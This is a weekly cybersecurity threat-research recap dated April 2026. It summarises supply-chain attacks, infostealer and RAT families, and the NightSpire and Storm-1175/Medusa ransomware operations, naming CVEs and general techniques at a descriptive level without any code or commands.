Threat Research | Weekly Recap [12 Apr 2026] Cybersecurity Threat Research 'Weekly' Recap. This week highlighted a broad surge in supply‑chain and package ecosystem attacks, AI-themed lure campaigns around Claude and related tooling, evolving infostealer and RAT families (STX RAT, Lumma/Remus), trojanized installers and MaaS campaigns (ClickFix, CastleLoader), ransomware operations (Storm1175/Medusa, NightSpire) and pervasive vulnerability disclosures, with notable data exfiltration tied to TeamPCP and a focus on defense exercises and immutable backups. #TeamPCP #Axios #STXRAT #Remus #Lumma #CastleLoader #ClipBanker #HWMonitor #ScreenConnect #Storm1175 #Medusa #NightSpire #BeastRansomware #Sinobi #EvilTokens #Graphalgo #ForestBlizzard #APT35 #DPRK #Handala #MOIS #OpenClaw #Marimo #Kubernetes #FortiGate

This week’s threat recap reveals a spike in supply-chain attacks, AI-themed lures targeting Claude tools, evolving infostealers (STX RAT, Lumma/Remus), MaaS campaigns, ransomware (Storm1175, NightSpire), and major data leaks by TeamPCP. #AIThreats #RansomwareOps

Decoding NightSpire: Ransomware IOCs Aren't Set in Stone NightSpire ransomware incidents show varying TTPs across separate intrusions, including use of remote access, third‑party tools for data staging and exfiltration, and changes to ransom notes and encryptor hashes over time. These variations complicate attribution and detection, particularly when operations may be run in‑house or as RaaS affiliates. #NightSpire #Huntress

NightSpire ransomware shows evolving TTPs including varied ransom notes, encryptor hashes, and use of remote access plus third-party tools for data staging and exfiltration. Attribution remains complex. #RansomwareOps #DataExfiltration #RemoteAccess

Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations Storm-1175 (reported alongside the public label “OWASSRF”) has exploited multiple public-facing application vulnerabilities—including CVE‑2022‑41080/CVE‑2022‑41082 in Exchange OWA—to gain initial access, deploy web shells or remote access payloads, and rapidly move to Medusa ransomware deployment. The actor has also leveraged zero-days and N-day flaws (e.g., CVE‑2026‑23760 in SmarterMail and CVE‑2025‑10035 in GoAnywhere MFT), abused LOLBins, RMM tools, Impacket, PDQ Deployer, and Rclone for credential theft, lateral movement, exfiltration, and Defender tampering to enable double-extortion operations. #Storm-1175 #Medusa

Storm-1175 exploits web-facing apps including Exchange OWA zero-days and vulnerabilities to deploy Medusa ransomware rapidly. Techniques include credential theft, lateral movement, and Defender tampering. #RansomwareOps #ExchangeServer #ThreatIntel